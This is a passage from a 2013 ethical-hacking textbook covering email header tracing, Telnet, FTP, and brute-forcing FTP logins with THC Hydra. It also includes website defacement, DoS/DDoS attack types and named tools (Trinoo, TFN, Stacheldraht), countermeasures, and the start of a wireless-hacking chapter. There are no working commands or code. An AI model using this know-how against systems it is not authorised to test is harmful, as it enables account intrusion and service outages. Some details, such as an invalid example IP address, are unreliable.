headers can be thought of like envelopes for postal mail. They contain
the electronic equivalent of addressing and postmarks that reflect the
routing of mail from source to destination.

A) Finding IP Addresses in Email Headers

i. Now start looking for a line start with “Received: from“. You’ll
notice there are multiple Received From in the message header
because the message header contains the IP addresses of all of
servers involved in routing that email to you.

ii. To find the first computer that originally sent the email, you’ll
have to find the Received From that’s most below of the page this
is telling you where the email originated. Follow that line all the
way across. At the end, in brackets, is the IP address of the
person or company who sent the email to you.

iii. For example:

"Received: from myserver1.myemailserver.com(123-45-567-

8.myemailserver.com[123.45.567.8])"
If there are more than two fields that start with "Received: from"
that have a corresponding IP address contained in brackets, the
message sender is the last one listed.
iv. In the headers, you are looking for the line that starts with "X-
Originating-IP header" or "Received From". This will be the IP
address of the computer the originating writer used to send the
email message.

v. Now you already know your email’s originating IP address. Next,

you need to check the location of the IP address. You can use
IP2Location or Domain Tools or www.dnsstuff.comfor particular
IP address.

64
http://compnetworking.about.com/od/workingwithipaddresses/qt/ipaddressemail.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 150
 Ethical Hacking Part I

vi. If you want specified details like full address of email sender, you
could try going to ipligence.com/email trace. They charge a fee to
do this, but sometimes it is worth it.

vii. You can also go to ARIN website to do a search for the IP address
and find out who it belongs to. ARIN is the American Registry for
Internet Numbers. You will not need an account or have to pay a
fee for a quick search.

viii. Copy the IP address into the box at the top right-handed corner
of the page where it reads "Search WHOIS" and click "Search".

ix. Read the information on the next page that appears as a result of
your search. It will give you the organization or individual who
owns the IP address used to send the original email.

x. You can trace the sender online with the help of following link
which provides the email tracing facility.

http://www.ip-adress.com/trace_email/
http://www.johnru.com/active-whois/trace-email.html
http://whatismyipaddress.com/staticpages/index.php/trace-
email-source-IP-address
http://www.usus.org/elements/tracing.htm

B) Internet Email Services and IP Addresses

Finally, the popular Internet-based email services differ greatly in their

use of IP addresses in email headers. Use these tips to identify IP
addresses in such mails.

i. Google's Gmail service omits the sender IP address information from

all headers. Instead, only the IP address of Gmail's mailserver is
shown in Received: from. This means it is impossible to find a
sender's true IP address in a received Gmail.

ii. Microsoft's Hotmail service provides an extended header line called

"X-Originating-IP" that contains the sender's actual IP address.

iii. Emails from Yahoo (if untampered) contain the sender's IP address in
the last Received: entry.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 151

 Ethical Hacking Part I

CHAPTER 10
TELNET AND FTP
Objective
10.1 Introduction of Telnet
10.2 Uses of FTP
10.3 Anonymous FTP login
10.4 Website Defacement

10.1 Introduction to Telnet

65Telnet (teletype network) is a network protocol used on the Internet or
local area networks to provide a bidirectional interactive communications
facility. Typically, telnet provides access to a command-line interface on a
remote host via a virtual terminal connection which consists of an 8-bit
byte oriented data connection over the Transmission Control Protocol
(TCP). User data is interspersed in-band with TELNET control
information.

The term telnet may also refer to the software that implements the client
part of the protocol. Telnet client applications are available for virtually
all computer platforms. Most network equipment and operating systems
with a TCP/IP stack support a Telnet service for remote configuration
(including systems based on Windows NT). Because of security issues
with Telnet, its use has waned in favor of SSH for remote access.

Telnet means to establish a connection with the Telnet protocol, either

with command line client or with a programmatic interface. For example,
a common directive might be: "To change your password, telnet to the
server, login and run the passwd command." Most often, a user will be
telnetting to a Unix-like server system or a network device such as a
router and obtain a login prompt to a command line text interface or a
character-based full-screen manager.

On many systems, a Telnet client application may also be used to

establish interactive raw-TCP sessions. It is commonly believed that a
Telnet session which does not use the IAC (character 255) is functionally
identical. This is not the case, however, because there are other network

65
http://wiki.wdlxtv.com/Telnet_and_ssh_remote_connections
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 152
 Ethical Hacking Part I

virtual terminal (NVT) rules, such as the requirement for a bare carriage
return character (CR, ASCII 13) to be followed by a NULL (ASCII 0)
character, that distinguish the telnet protocol from raw-TCP sessions.

Telnet is a client-server protocol, based on a reliable connection-oriented

transport. Typically this protocol is used to establish a connection to
Transmission Control Protocol (TCP) port number 23, where a Telnet
server application is listening. Telnet, however, predates TCP/IP and was
originally run over Network Control Program (NCP) protocols.

10.1.1 Use of Telnet

Logging in as a remote terminal

Telnet is a program to let you login to another computer on the Internet.

In most cases you must have a valid, authorized username and password
for the remote machine, although there are a few public services which
let anyone log in.

Connecting

Before you start, you need to know the Internet name (or the numeric IP
address) of the machine you want to log into.

The names of machines are usually in the format machine.site.network,

for example rtfm.mit.edu, but you can also use the numeric (IP) address
if you know it (four numbers separated by dots, e.g. 18.70.0.209). Note
that some countries add a fourth, and sometimes even a fifth, element to
the name, e.g.juno.cs.soton.ac.uk.

To connect, type the command telnet followed by the machine name or IP

address, e.g.

telnet wotcha.umb.edu

The remote machine will respond with the login prompt (and sometimes
a warning message about remote usage). Login as normal (give your
username, press the Enter key, then type your password and press Enter
again). From then on, it is exactly as if you were logged in, sitting at their
site.

Don't forget to log out when you have finished!

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 153

 Ethical Hacking Part I

Graphical Telnet programs for windowing systems usually let you store
frequently-used addresses and retrieve them from a menu so you don't
have to retype them every time. In these cases, it is probably not a good
idea to store the passwords as well; otherwise anyone who can use your
computer would also be able to log in to your remote sites as well.

10.2 Uses of FTP

66File Transfer Protocol (FTP) is a standard network protocol used to
exchange and manipulate files over a TCP/IP based network, such as the
Internet. FTP is built on client-server architecture and utilizes separate
control and data connections between the client and server applications.
Applications were originally interactive command-line tools with
standardized command syntax, but graphical user interfaces have been
developed for all desktop operating systems in use today. FTP is also
often used as an application component to automatically transfer files for
program internal functions. FTP can be used with user-based password
authentication or with anonymous user access. The Trivial File Transfer
Protocol (TFTP) is a similar, but simplified, not interoperable, and
unauthenticated version of FTP.

Objectives of FTP

 To promote sharing of files (computer programs and/or data).

 To encourage indirect or implicit use of remote computers.

 To shield a user from variations in file storage systems among

different hosts.

 To transfer data reliably, and efficiently.

FTP runs over the Transmission Control Protocol (TCP). Usually FTP
servers listen on the well-known port number 21 (IANA-reserved) for
incoming connections from clients. A connection to this port from the
FTP client forms the control stream on which commands are passed to
the FTP server and responses are collected. FTP uses out-of-band
control; it opens dedicated data connections on other port numbers. The
parameters for the data streams depend on the specifically requested
transport mode. Data connections usually use port number 20.

66
en.wikipedia.org/wiki/File_Transfer_Protocol
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 154
 Ethical Hacking Part I

In active mode, the FTP client opens a dynamic port, sends the FTP
server the dynamic port number on which it is listening over the control
stream and waits for a connection from the FTP server. When the FTP
server initiates the data connection to the FTP client it binds the source
port to port 20 on the FTP server.

In passive mode, the FTP server opens a dynamic port, sends the FTP
client the server's IP address to connect to and the port on which it is
listening (a 16-bit value broken into a high and low byte, as explained
above) over the control stream and waits for a connection from the FTP
client. In this case, the FTP client binds the source port of the connection
to a dynamic port.
While data is being transferred via the data stream, the control stream
sits idle. This can cause problems with large data transfers through
firewalls which time out sessions after lengthy periods of idleness. While
the file may well be successfully transferred, the control session can be
disconnected by the firewall, causing an error to be generated.
The FTP protocol supports resuming of interrupted downloads using the
REST command. The client passes the number of bytes it has already
received as argument to the REST command and restarts the transfer. In
some command line clients for example, there is an often-ignored but
valuable command, "reget" (meaning "get again"), that will cause an
interrupted "get" command to be continued, hopefully to completion,
after a communications interruption.

While transferring data over the network, several data representations

can be used. The two most common transfer modes are:

 ASCII mode
 Binary mode: In "Binary mode", the sending machine sends each
file byte for byte and as such the recipient stores the bytestream as
it receives it. (The FTP standard calls this "IMAGE" or "I" mode)

10.2.1 How to use FTP

In order to use FTP, you'll need to download and install a software
program on your computer. The most widely used FTP program is Smart
FTP. You can find it here: http://www.smartftp.com. Also check out
other FTP Downloads here.
When you first launch the FTP program, a startup screen will appear.
This screen will enable you to add your website information and allow

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 155

 Ethical Hacking Part I

the program to connect with your server. You simply fill in the
information where indicated with the following information:
Profile Name - This name will be added to the selection list of profile
names. Select your profile name according to your domain. For example,
if your domain name were smiths.com, your profile name might be
Smiths.
Host Name/Address - Your domain name address.
Example - www.candidinfo.com
Host Type - The type of server in which your website is hosted. The
standard is UNIX. But you can probably skip it.
User ID - Your hosting User ID. Example - candidinfo.
Password - Your hosting password.
Depending on which FTP client you use, the names may be slightly
different.
Once the FTP program has connected with your server, you will see the
files on your computer in the left window and the files on your server will
be displayed in the right window.

Transferring Files67
To maneuver through your folders, simply double click on them. To
transfer your files, either double click on the file or highlights it and then
click on the transfer files arrow.
Sometimes, you will have to upload your files to a special directory,
like WWW or Public_HTML, but most providers let`s you upload the files
to the current directory. To select more than one file at a time, click on
each file you'd like to transfer while holding down the Ctrl key on your
keyboard. Keep in mind, all of the files you select must be uploaded in
the same mode. In other words, you could upload all of your HTML files
at the same time, or all of your images.
If all of the files you'd like to upload are all together, you can click on the
first file while holding down your Shift key and use the down arrow on
your keyboard to highlight all of your files.Files such as text, HTML, and
most scripts should be uploaded to your server in ASCII mode. Any file
that isn't ASCII text, such as programs (EXE, ZIP), graphics, eBooks,
sounds (WAV, MID) and movies should be uploaded to your server in
Binary mode.

67
masteringwebhosting.com/ws-ftp-tutorial/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 156
 Ethical Hacking Part I

10.2.2 Hacking FTP server using THC hydra

68THC Hydra: A Fast network authentication cracker which supports

many different services. When you need to brute force crack a remote
authentication service, Hydra is often the tool of choice. It can perform
rapid dictionary attacks against more than 30 protocols, including telnet,
ftp, http, https, smb, several databases, and much more. Like THC Amap
this release is from the fine folks at THC.

This tutorial teach you how you can hack by FTP THC-Hydra - The Fast
and Flexible Network Login Hacking Tool

Introduction

Number one of the biggest security holes are passwords, as every

password security study shows. Hydra is a parallelized login cracker
which supports numerous protocols to attack. New modules are easy to
add, beside that; it is flexible and very fast.

Currently this tool supports:

TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL,

MYSQL, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5,
VNC, POP3, IMAP, NNTP, PCNFS,ICQ, SAP/R3, LDAP2, LDAP3, Postgres,
Teamspeak, Cisco auth, Cisco enable,LDAP2, Cisco AAA.

This tool is a proof of concept code, to give researchers and security

consultants the possibility to show how easy it would be to gain
unauthorized access from remote to a system.

68
www.insecure.in/hacktools_02.asp
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 157
 Ethical Hacking Part I

Figure 10.1:(1)Target selection

(2) Login/Password setup

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 158

 Ethical Hacking Part I

(3) Hydra start and output

10.3 Anonymous FTP login69

You can allow anonymous FTP access to visitors wishing to download or
upload files to your web site as if you were running your own FTP server.
You can enable and disable ANON FTP access within your Web Control
Panel.

Anonymous FTP warnings:

Security

Anonymous FTP will grant any and all users the ability to access your
"upload" directory, or any directory on your domain that has been set for
"public" read/write permissions. Anonymous users will have access to
upload or download files to and from your domain. You must set the
appropriate permissions for your directories to restrict anonymous FTP
access. This is needed to ensure that anonymous users will not be able
to access any existing files or directories. You can inhibit access to
specific files and directories on our UNIX servers using the File Manager

69
http://safire.net/support/anon_ftp.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 159
 Ethical Hacking Part I

by disabling public read and/or write access to the files or folders you
don't want people to see.

Responsibility

As the account owner, you are responsible for any and all files that are
stored on your domain. This would include files that were uploaded by
you as well as by anonymous FTP users. With the use of anonymous
FTP, your site is susceptible of becoming a "warez" site. Typically, these
are sites that are used by "hackers" to trade upload/download illegally
pirated copies of software programs with one another. As the account
owner, the complete content of your account is your responsibility. If
your site becomes a trading post for "warez" programs, you may face
legal action that can be taken against you by the programmers/software
companies of the copyrighted software.

Data Transfer

Any and all FTP download transfers, anonymous FTP included, will be
used in the calculation of the total data transfer for your account. If this
total data transfer amount exceeds the limit that is set for your plan, you
will be responsible for any and all overage charges that occur. Once
anonymous FTP has been enabled, it will be your responsibility to
monitor the anonymous FTP activity for your account.
Disk Space

If you are going to allow people to upload files to your site, make sure
you keep track of your disk space usage via your Control Panel. Do not
allow your disk space usage to get too close to your maximum disk space
allocation or you may experience problems accessing your site via
FrontPage and/or be unable to upload or modify files. You may purchase
additional disk space if necessary.

Once you enable ANON FTP, files can be accessed anonymously via FTP
client or by using the following URL format:
ftp://ftp.yourdomain.com/<FILENAME>
Anonymous visitors wishing to access your site via FTP client (e.g.
ws_ftp) must use the following information:
FTP hostname: yourdomain.com
userid: anonymous
Password: guest

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 160

 Ethical Hacking Part I

10.4 Website Defacement

Website defacement is an attack on a website that changes the visual
appearance of the site. These are typically the work of system crackers,
who break into a web server and replace the hosted website with one of
their own.
A message is often left on the webpage stating his or her pseudonym and
the output from "uname -a" and the "id" command along with "shout
outs" to his or her friends. Sometimes, the Defacer makes fun of the
system administrator for failing to maintain server security. Most times,
the defacement is harmless; however, it can sometimes be used as a
distraction to cover up more sinister actions such as uploading malware.

70

70
media.devilscafe.in
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 161
 Ethical Hacking Part I

CHAPTER 11
DOS ATTACK
Objective
11.1 Introduction of DOS
11.2 Types of DoS Attacks
11.3 Working process of DDoS Attacks
11.4 BOTs/BOTNETs Working
11.5 Forms of denial of service
11.6 Tools for Dos Attack
11.7 Countermeasures

11.1. Introduction DOS71

A DoS (Denial of Service) attack is an attempt by a hacker to flood a
user’s or an organization’s system and an attempt to make a computer
resource unavailable to its intended users. During a Denial of Service
(DoS) attack, a hacker renders a system unusable or significantly slows
the system by overloading resources or preventing legitimate users from
accessing the system. These attacks can be perpetrated against an
individual system or an entire network.

In a denial-of-service (DoS) attack, an attacker attempts to prevent

legitimate users from accessing information or services. By targeting your
computer and its network connection, or the computers and network of
the sites you are trying to use, an attacker may be able to prevent you
from accessing email, websites, online accounts (banking, etc.), or other
services that rely on the affected computer.

The most common and obvious type of DoS attack occurs when an
attacker "floods" a network with information. When you type a URL for a
particular website into your browser, you are sending a request to that
site's computer server to view the page. The server can only process a
certain number of requests at once, so if an attacker overloads the server
with requests, it can't process your request. This is a "denial of service"
because you can't access that site.

An attacker can use spam email messages to launch a similar attack on

your email account. Whether you have an email account supplied by
71
http://en.wikipedia.org/wiki/Denial-of-service_attack
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 162
 Ethical Hacking Part I

your employer or one available through a free service such as Yahoo or

Hotmail, you are assigned a specific quota, which limits the amount of
data you can have in your account at any given time. By sending many,
or large, email messages to the account, an attacker can consume your
quota, preventing you from receiving legitimate messages.

Although a DoS attack does not usually result in the theft of information
or other security loss, it can cost the target person or company a great
deal of time and money. Typically, the loss of service is the inability of a
particular network service, such as e-mail, to be available or the
temporary loss of all network connectivity and services. A denial of
service attack can also destroy programming and files in affected
computer systems. In some cases, DoS attacks have forced Web sites
accessed by millions of people to temporarily cease operation.

Attacks can be directed at any network device, including attacks on

routing devices and web, electronic mail, or Domain Name System
servers.

A DoS attack can be perpetrated in a number of ways. The five basic

types of attack are:72

1. Consumption of computational resources, such as bandwidth, disk

space, or processor time
2. Disruption of configuration information, such as routing
information.
3. Disruption of state information, such as unsolicited resetting of
TCP sessions.
4. Disruption of physical network components.
5. Obstructing the communication media between the intended users
and the victim so that they can no longer communicate adequately.

A DoS attack may include execution of malware intended to:

 Max out the processor's usage, preventing any work from

occurring.
 Trigger errors in the microcode of the machine.
 Trigger errors in the sequencing of instructions, so as to force the
computer into an unstable state or lock-up.

72
http://en.wikipedia.org/wiki/Denial-of-service_attack
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 163
 Ethical Hacking Part I

 Exploit errors in the operating system, causing resource starvation

and/or thrashing, i.e. to use up all available facilities so no real
work can be accomplished.
 Crash the operating system itself.

Case Study:Stuxnet is a highly sophisticated computer worm.

Discovered in June 2010, Stuxnet initially spreads via Microsoft
Windows, and targets Siemens industrial software and equipment. The worm
initially spreads indiscriminately, but includes a highly specialized
malware payload that is designed to target only Siemens supervisory
control and data acquisition (SCADA) systems that are configured to
control and monitor specific industrial processes. Stuxnet infects PLCs
by subverting the software application that is used to reprogram these
devices. Because of this PLCs deny to give services require for specific
processes, it means it is a Denial of Service (DoS) attack.

11.2. Types of DoS Attacks

There are two main categories of DoS attacks. DoS attacks can be either
sent by a single system to a single target (simple DoS) or sent by many
systems to a single target (DDoS). The goal of DoS isn’t to gain
unauthorized access to machines or data, but to prevent legitimate users
of a service from using it.

i. Dos attack: Simple denial-of-service attack where single system to

a single target is involved

ii. DDoS attacks: DDoS (Distributed denial-of-service) attacks can be

perpetrated by BOTs and BOTNETS, which are compromised
systems that an attacker uses to launch the attack against the end
victim. The system or network that has been compromised is a
secondary victim, whereas the DoS and DDoS attacks flood the
primary victim or target.

11.3. How DDoS Attacks Work

DDoS is an advanced version of the DoS attack. Like DoS, DDoS also
tries to deny access to services running on a system by sending packets
to the destination system in a way that the destination system can’t
handle. The key of a DDoS attack is that it relays attacks from many
different hosts (which must first be compromised), rather than from a

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 164

 Ethical Hacking Part I

single host like DoS. DDoS is a large-scale, coordinated attack on a

victim system.

The services under attack are those of the primary victim; the
compromised systems used to launch the attack are secondary victims.
These compromised systems, which send the DDoS to the primary
victim, are sometimes called zombies or BOTs. They’re usually
compromised through another attack and then used to launch an attack
on the primary victim at a certain time or under certain conditions. It
can be difficult to track the source of the attacks because they originate
from several IP addresses.

Normally, DDoS consists of three parts:

 Master/Handler

 Slave/secondary victim/zombie/agent/BOT/BOTNET

 Victim /primary victim

Figure 11.1: Dos Attack

The master is the attack launcher. A slave is a host that is compromised

by and controlled by the master. The victim is the target system. The
master directs the slaves to launch the attack on the victim system.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 165
 Ethical Hacking Part I

DDoS is done in two phases. In the intrusion phase, the hacker

compromises weak systems in different networks around the world and
installs DDoS tools on those compromised slave systems. In the DDoS
attack phase, the slave systems are triggered to cause them to attack the
primary victim.

11.4. How BOTs/BOTNETs Work73

One of the most common and efficient DDoS attack methods are based
on using hundreds of zombie hosts. Zombies are usually controlled and
managed via IRC networks, using so-called botnets.

A BOT is short for web robot and is an automated software program that
behaves intelligently. Spammers often use BOTs to automate the posting
of spam messages on newsgroups or the sending of emails. BOTs can
also be used as remote attack tools. Most often, BOTs are web software
agents that interface with web pages. For example, web crawler (spiders)
is web robots that gather web-page information. The most dangerous
BOTs are those that covertly install themselves on users’ computers for
malicious purposes.

Some BOTs communicate with other users of Internet-based services via

instant messaging, Internet Relay Chat (IRC) or another web interface.
These BOTs allow IRQ users to ask questions in plain English and then
formulate a proper response. Such BOTs can often handle many tasks,
including reporting weather, providing zip-code information, listing
sports scores, converting units of measure, such as currency, and so on.

73
http://www.infosecwriters.com/text_resources/pdf/DSlee_Denial_of_Service_Attacks.pdf
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 166
 Ethical Hacking Part I

Figure 11.2:BOTNETs

A BOTNET is a group of BOT systems. BOTNETs serve various purposes,

including DDoS attacks, creation or misuse of Simple Mail Transfer
Protocol (SMTP) mail relays for spam, Internet Marketing fraud, the theft
of application serial numbers, login IDs, and financial information such
as credit card numbers.

Generally a BOTNET refers to a group of compromised systems running a

BOT for the purpose of launching a coordinated DDOS attack.

11.5. Common forms of denial of service attacks are:74

i. Buffer Overflow Attacks

The most common kind of DoS attack is simply to send more traffic to a
network address than the programmers who planned its data buffers
anticipated someone might send. The attacker may be aware that the
target system has a weakness that can be exploited or the attacker may

74
http://en.wikipedia.org/wiki/Denial-of-service_attack
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 167
 Ethical Hacking Part I

simply try the attack in case it might work. A few of the better-known
attacks based on the buffer characteristics of a program or system
include:

 Sending e-mail messages that have attachments with 256-

character file names to Netscape and Microsoft mail programs
 Sending oversized Internet Control Message Protocol (ICMP)
packets (this is also known as the Packet Internet or Inter-Network
Groper (PING) of death)
 Sending to a user of the Pine e-mail program a message with a
"From" address larger than 256 characters

ii. Smurf Attack

A smurf attack
sends a large
amount of ICMP
echo (ping) traffic to
a broadcast IP
address with the
spoofed source
address of a victim.
Each secondary
victim’s host on that
IP network replies to
the ICMP echo
request with an echo
reply, multiplying
the traffic by the
number of hosts
responding. On a

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 168

 Ethical Hacking Part I

multi access broadcast network, hundreds of machines might reply to

each packet. This creates a magnified DoS attack of ping replies, flooding
the primary victim. IRC servers are the primary victim of smurf attacks
on the Internet.

In this attack, the perpetrator sends an IP ping (or "echo my message

back to me") request to a receiving site The ping packet specifies that it
be broadcast to a number of hosts within the receiving site's local
network. The packet also indicates that the request is from another site,
the target site that is to receive the denial of service. (Sending a packet
with someone else's return address in it is called spoofing the return
address.) The result will be lots of ping replies flooding back to the
innocent, spoofed host. If the flood is great enough, the spoofed host will
no longer be able to receive or distinguish real traffic.

iii. SYN Flooding

A SYN flood attack sends TCP connection requests faster than a machine
can process them. The attacker creates a random source address for
each packet and sets the SYN flag to request a new connection to the
server from the spoofed IP address. The victim responds to the spoofed IP
address and then waits for the TCP confirmation that never arrives.
Consequently, the victim’s connection table fills up waiting for replies;
after the table is full, all new connections are ignored. Legitimate users
are ignored, as well, and can’t access the server. Some of the methods to
prevent SYN Flood attacks are SYN cookies, RST cookies, Micro Blocks,
and Stack Tweaking.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 169

 Ethical Hacking Part I

When a session is initiated between the Transport Control Program (TCP)

client and server in a network, a very small buffer space exists to handle
the usually rapid "hand-shaking" exchange of messages that sets up the
session. The session-establishing packets include a SYN field that
identifies the sequence in the message exchange. An attacker can send a
number of connection requests very rapidly and then fail to respond to
the reply. This leaves the first packet in the buffer so that other,
legitimate connection requests can't be accommodated. Although the
packet in the buffer is dropped after a certain period of time without a
reply, the effect of many of these bogus connection requests is to make it
difficult for legitimate requests for a session to get established. In
general, this problem depends on the operating system providing correct
settings or allowing the network administrator to tune the size of the
buffer and the timeout period.

iv. Teardrop Attack

This type of denial of service attack exploits the way that the Internet
Protocol (IP) requires a packet that is too large for the next router to
handle be divided into fragments. The fragment packet identifies an
offset to the beginning of the first packet that enables the entire packet to
be reassembled by the receiving system. In the teardrop attack, the
attacker's IP puts a confusing offset value in the second or later
fragment. If the receiving operating system does not have a plan for this
situation, it can cause the system to crash.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 170

 Ethical Hacking Part I

11.6. Tools for Dos Attack

i. Ping of Death is an attack that can cause a system to lock up by

sending multiple IP packets, which will be too large for the
receiving system when reassembled. Ping of Death can cause DoS
to clients trying to access the server that has been a victim of the
attack.

ii. SSPing is a program that sends several large fragmented, Internet

Control Message Protocol (ICMP) data packets to a target system.
This will cause the computer receiving the data packets to freeze
when it tries to reassemble the fragments. A LAND attack sends a
packet to a system where the source IP is set to match the target
system’s IP address. As a result, the system attempts to reply to
itself, causing the system to create a loop which will tie up system
resources and eventually may crash the OS.

iii. CPU Hog is a DoS attack tool that uses up the CPU resources on a
target system, making it unavailable to the user.

iv. WinNuke is a program that looks for a target system with port 139
open, and sends junk IP traffic to the system on that port. This
attack is also known as an Out of Bounds (OOB) attack and
causes the IP stack to become overloaded, and eventually the
system crashes.

v. Jolt2 is DoS tool that sends a large number of fragmented IP

packets to a Windows target. These ties up system resources and
eventually will lock up the system; Jolt2 isn’t Windows specific as
many Cisco routers and other gateways may be vulnerable to the
Jolt2 attack.

vi. Bubonic is a DoS tool which works by sending TCP packets with
random settings, in order to increase the load of the target
machine so it eventually crashes.

vii. Targa is a program that can be used to run eight different DoS
attacks. The attacker has the option to either launch individual
attacks or try all of the attacks until one is successful.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 171

 Ethical Hacking Part I

viii. RPC Locator is a service that, if unpatched, has a vulnerability to

bugger overflows. The RPC Locator service in Windows allows
distributed applications to run on the network. It is susceptible to
DoS attacks, and many of the tools that perform DoS attacks
exploit this vulnerability.

Tools for DDos Attack

i. Trinoo is a tool which sends User Datagram Protocol (UDP) traffic

to create a DDoS attack. The Trinoo master is a system used to
launch a DoS attack against one or more target systems. The
master instructs agent processes called daemons on previously
compromised systems (secondary victims), to attack one or more IP
addresses. This attack occurs for a specified period of time. The
Trinoo agent or daemon is installed on a system that suffers from
buffer overflow vulnerability. WinTrinoo is a Windows version of
Trinoo and has the same functionality as Trinoo.

ii. Shaft is a derivative of the Trinoo tool that uses UDP

communication between masters and agents. Shaft provides
statistics on the flood attack that attackers can use to know when
the victim system is shut down; Shaft provides UDP, ICMP, and
TCP flooding attack options.

iii. Tribal Flood Network (TFN) allows an attacker to use both

bandwidth-depletion and resource depletion attacks. TFN does
UDP and ICMP flooding as well as TCP SYN and smurf attacks.
TFN2K is based on TFN, with features designed specifically to
make TFN2K traffic difficult to recognize and filter. It remotely
executes commands, hides the source of the attack using IP
address spoofing, and uses multiple transport protocols including
UDP, TCP, and ICMP.

iv. Stacheldraht is similar to TFN and includes ICMP flood, UDP flood,
and TCP SYN attack options. It also provides a secure Telnet
connection (using symmetric key encryption) between the attacker
and the agent systems (secondary victims). This prevents system
administrators from intercepting and identifying this traffic.

v. Mstream uses spoofed TCP packets with the ACK flag set to attack
a target. It consists of a handler and an agent portion, but access
to the handler is password protected.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 172

 Ethical Hacking Part I

11.7.Describe the DoS/DDoS Countermeasures75

There are several ways to detect, halt, or prevent DoS attacks. The
following are common security features available:

i. Network-ingress filtering

All network access providers should implement network-ingress

filtering to stop any downstream networks from injecting packets
with faked or spoofed addresses into the Internet. Although this
doesn’t stop an attack from occurring, it does make it much easier
to track down the source of the attack and terminate the attack
quickly.

ii. Rate-limiting network traffic

A number of routers in the market today have features that let you
limit the amount of bandwidth some types of traffic can consume.
This is sometimes referred to as traffic shaping.

iii. Intrusion detection systems

Use an intrusion detection system (IDS) to detect attackers who are

communicating with slave, master, or agent machines. Doing so
lets you know whether a machine in your network is being used to
launch a known attack but probably won’t detect new variations of
these attacks or the tools that implement them. Most IDS vendors
have signatures to detect Trinoo, TFN, or Stacheldraht network
traffic.

iv. Host-auditing tools

File-scanning tools are available that attempt to detect the
existence of known DDoS tool client and server binaries in a
system.

v. Network-auditing tools
Network-scanning tools are available that attempt to detect the
presence of DDoS agents running on hosts on your network.

75
http://certifiedethicalhackerceh.blogspot.in/2012/05/dosddos-countermeasures.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 173
 Ethical Hacking Part I

vi. Automated network-tracing tools

Tracing streams of packets with spoofed address through the
network is a time-consuming task that requires the cooperation of
all networks carrying the traffic and that must be completed while
the attack is in progress.

vii. DoS Scanning Tools

Find_ddos is a tool that scans a local system that likely contains a

DDoS program. It can detect several known DoS attack tools.

SARA gathers information about remote hosts and networks by

examining network services. This includes information about the
network information services as well as potential security flaws
such as incorrectly set up or configured network services, well-
known bugs in the system or network utilities system software
vulnerabilities listed in the Common Vulnerabilities and Exposures
(CVE) database, and weak policy decisions.

RID is a free scanning tool that detects the presence of Trinoo,

TFN, or Stacheldraht clients. Zombie Zapper instructs zombie
routines to go to sleep, thus stopping their attack. You can use the
same commands an attacker would use to stop the attack.

viii. Switches
Most switches have some rate-limiting and ACL capability. Some
switches provide automatic and/or system-wide rate limiting,
traffic shaping, delayed binding (TCP splicing), deep packet
inspection and Bogon filtering (bogus IP filtering) to detect and
remediate denial of service attacks through automatic rate filtering
and WAN Link failover and balancing
These schemes will work as long as the DoS attacks are something
that can be prevented by using them. For example SYN flood can
be prevented using delayed binding or TCP splicing. Similarly
content based DoS can be prevented using deep packet inspection.
Attacks originating from dark addresses or going to dark addresses
can be prevented using Bogon filtering. Automatic rate filtering can
work as long as you have set rate-thresholds correctly and
granularly. Wan-link failover will work as long as both links have
DoS/DDoS prevention mechanism.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 174
 Ethical Hacking Part I

ix. Routers
Similar to switches, routers have some rate-limiting and ACL
capability. They, too, are manually set. Cisco IOS has features that
prevents flooding, i.e. example settings.

x. Application front end hardware

Application front end hardware is intelligent hardware placed on
the network before traffic reaches the servers. It can be used on
networks in conjunction with routers and switches. Application
front end hardware analyzes data packets as they enter the
system, and then identifies them as priority, regular, or dangerous.

xi. IPS based prevention

Intrusion-prevention systems (IPS) are effective if the attacks have
signatures associated with them. However, the trend among the
attacks is to have legitimate content but bad intent. Intrusion-
prevention systems which work on content recognition cannot
block behavior-based DoS attacks.
An ASIC based IPS can detect and block denial of service attacks
because they have the processing power and the granularity to
analyze the attacks and act like a circuit breaker in an automated
way.
A rate-based IPS (RBIPS) must analyze traffic granularly and
continuously monitor the traffic pattern and determine if there is
traffic anomaly. It must let the legitimate traffic flow while blocking
the DoS attack traffic.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 175

 Ethical Hacking Part I

CHAPTER 12

HACKING WIRELESS NETWORK

Objective
6.1 Introduction of Wireless Network
6.2 Overview of WEP, WPA
6.3 Techniques of Wireless Hacking
6.4 Secure Wireless Networks Method
6.5 Wireless Hacking Tools

76

12.1. Introduction

Wireless networks add another entry point into a network for hackers.
Wireless is a relatively new technology and ripe with security holes.
Because of the broadcast nature of Radio Frequency (RF) wireless
networks and the rapid adoption of wireless technologies for home and
business networks, many vulnerabilities and exploits exist. Most of the
wireless networks in home or in offices are not secured by passwords or
by any encrypting protocols (Open Wireless Networks)
76
chmag.in
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 176
 Ethical Hacking Part I

Case Study: The terror emails sent from the WiFi connections of an
American in Navi Mumbai and Mumbai's Khalsa College is the best
example of such open wireless networks and shows security loop holes in
wireless technology. These networks can also be used for identity thefts
and corporate espionage. Terror emails linked to July's bomb blasts in
Ahmedabad were traced to American national Kenneth Haywood's
unsecured WiFi network. Another terror email sent in name of terrorist
group was traced to a computer in Mumbai's Khalsa College.

